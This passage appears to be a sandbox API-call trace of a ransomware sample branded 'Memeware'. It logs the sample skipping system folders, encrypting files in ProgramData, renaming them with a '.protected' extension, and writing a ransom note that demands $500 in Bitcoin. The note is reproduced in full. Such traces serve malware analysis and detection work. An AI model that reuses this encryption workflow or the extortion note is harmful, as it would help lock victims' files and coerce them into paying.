lstrcmpiW (lpString1="usertile42.bmp", lpString2="Windows") returned -1 [0071.534] lstrcmpiW (lpString1="usertile42.bmp", lpString2="Program Files") returned 1 [0071.534] lstrcmpiW (lpString1="usertile42.bmp", lpString2="Program Files (x86)") returned 1 [0071.534] lstrcmpiW (lpString1="usertile42.bmp", lpString2="$Recycle.bin") returned 1 [0071.534] lstrcmpiW (lpString1="usertile42.bmp", lpString2="System Volume Information") returned 1 [0071.534] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp") returned 82 [0071.534] StrStrIW (lpFirst="usertile42.bmp", lpSrch=".protected") returned 0x0 [0071.534] lstrcmpW (lpString1="usertile42.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.534] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.534] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.534] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.534] lstrcmpiW (lpString1="usertile43.bmp", lpString2="Windows") returned -1 [0071.534] lstrcmpiW (lpString1="usertile43.bmp", lpString2="Program Files") returned 1 [0071.534] lstrcmpiW (lpString1="usertile43.bmp", lpString2="Program Files (x86)") returned 1 [0071.534] lstrcmpiW (lpString1="usertile43.bmp", lpString2="$Recycle.bin") returned 1 [0071.534] lstrcmpiW (lpString1="usertile43.bmp", lpString2="System Volume Information") returned 1 [0071.534] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp") returned 82 [0071.534] StrStrIW (lpFirst="usertile43.bmp", lpSrch=".protected") returned 0x0 [0071.534] lstrcmpW (lpString1="usertile43.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.534] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.534] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.534] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.534] lstrcmpiW (lpString1="usertile44.bmp", lpString2="Windows") returned -1 [0071.534] lstrcmpiW (lpString1="usertile44.bmp", lpString2="Program Files") returned 1 [0071.534] lstrcmpiW (lpString1="usertile44.bmp", lpString2="Program Files (x86)") returned 1 [0071.535] lstrcmpiW (lpString1="usertile44.bmp", lpString2="$Recycle.bin") returned 1 [0071.535] lstrcmpiW (lpString1="usertile44.bmp", lpString2="System Volume Information") returned 1 [0071.535] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp") returned 82 [0071.535] StrStrIW (lpFirst="usertile44.bmp", lpSrch=".protected") returned 0x0 [0071.535] lstrcmpW (lpString1="usertile44.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.535] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.535] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.535] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.535] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.535] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.535] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\RESTORE_FILES.txt") returned 85 [0071.535] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.540] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.540] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.540] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.540] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.540] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.540] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0071.540] CloseHandle (hObject=0xb4) returned 1 [0071.541] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.541] lstrcmpiW (lpString1="guest.bmp", lpString2="Windows") returned -1 [0071.541] lstrcmpiW (lpString1="guest.bmp", lpString2="Program Files") returned -1 [0071.541] lstrcmpiW (lpString1="guest.bmp", lpString2="Program Files (x86)") returned -1 [0071.541] lstrcmpiW (lpString1="guest.bmp", lpString2="$Recycle.bin") returned 1 [0071.541] lstrcmpiW (lpString1="guest.bmp", lpString2="System Volume Information") returned -1 [0071.541] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned 60 [0071.541] StrStrIW (lpFirst="guest.bmp", lpSrch=".protected") returned 0x0 [0071.541] lstrcmpW (lpString1="guest.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0071.541] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0071.541] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0071.541] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.541] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned 60 [0071.541] StrStrW (lpFirst="guest.bmp", lpSrch=".txt") returned 0x0 [0071.541] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned 60 [0071.541] StrStrW (lpFirst="guest.bmp", lpSrch=".rar") returned 0x0 [0071.541] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned 60 [0071.541] StrStrW (lpFirst="guest.bmp", lpSrch=".zip") returned 0x0 [0071.541] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0071.551] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.552] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0071.552] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.552] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0071.556] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0071.556] CloseHandle (hObject=0xb4) returned 1 [0071.556] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.protected") returned 70 [0071.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.protected" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp.protected")) returned 1 [0071.560] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.560] lstrcmpiW (lpString1="user.bmp", lpString2="Windows") returned -1 [0071.560] lstrcmpiW (lpString1="user.bmp", lpString2="Program Files") returned 1 [0071.560] lstrcmpiW (lpString1="user.bmp", lpString2="Program Files (x86)") returned 1 [0071.560] lstrcmpiW (lpString1="user.bmp", lpString2="$Recycle.bin") returned 1 [0071.560] lstrcmpiW (lpString1="user.bmp", lpString2="System Volume Information") returned 1 [0071.560] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned 59 [0071.560] StrStrIW (lpFirst="user.bmp", lpSrch=".protected") returned 0x0 [0071.560] lstrcmpW (lpString1="user.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.560] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0071.560] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0071.560] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.560] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned 59 [0071.560] StrStrW (lpFirst="user.bmp", lpSrch=".txt") returned 0x0 [0071.560] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned 59 [0071.561] StrStrW (lpFirst="user.bmp", lpSrch=".rar") returned 0x0 [0071.561] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned 59 [0071.561] StrStrW (lpFirst="user.bmp", lpSrch=".zip") returned 0x0 [0071.561] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0071.561] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.561] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0071.562] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.562] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0071.562] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0071.562] CloseHandle (hObject=0xb4) returned 1 [0071.562] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.protected") returned 69 [0071.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.protected" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp.protected")) returned 1 [0071.563] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0071.563] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0071.563] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\RESTORE_FILES.txt") returned 68 [0071.563] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\user account pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0071.563] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.563] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0071.564] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.564] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0071.564] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.564] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0071.564] CloseHandle (hObject=0xa4) returned 1 [0071.564] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.564] lstrcmpiW (lpString1="Vault", lpString2="Windows") returned -1 [0071.564] lstrcmpiW (lpString1="Vault", lpString2="Program Files") returned 1 [0071.564] lstrcmpiW (lpString1="Vault", lpString2="Program Files (x86)") returned 1 [0071.564] lstrcmpiW (lpString1="Vault", lpString2="$Recycle.bin") returned 1 [0071.564] lstrcmpiW (lpString1="Vault", lpString2="System Volume Information") returned 1 [0071.564] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault") returned 34 [0071.564] lstrcmpW (lpString1="Vault", lpString2=".") returned 1 [0071.564] lstrcmpW (lpString1="Vault", lpString2="..") returned 1 [0071.564] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*") returned 36 [0071.564] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0071.565] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.565] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.565] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.565] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.565] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.565] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\.") returned 36 [0071.565] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.565] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.565] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.565] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.565] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.565] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.565] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.565] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\..") returned 37 [0071.565] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.565] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.565] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0071.565] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0071.565] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\RESTORE_FILES.txt") returned 52 [0071.565] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\vault\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0071.568] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.568] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0071.571] lstrlenA 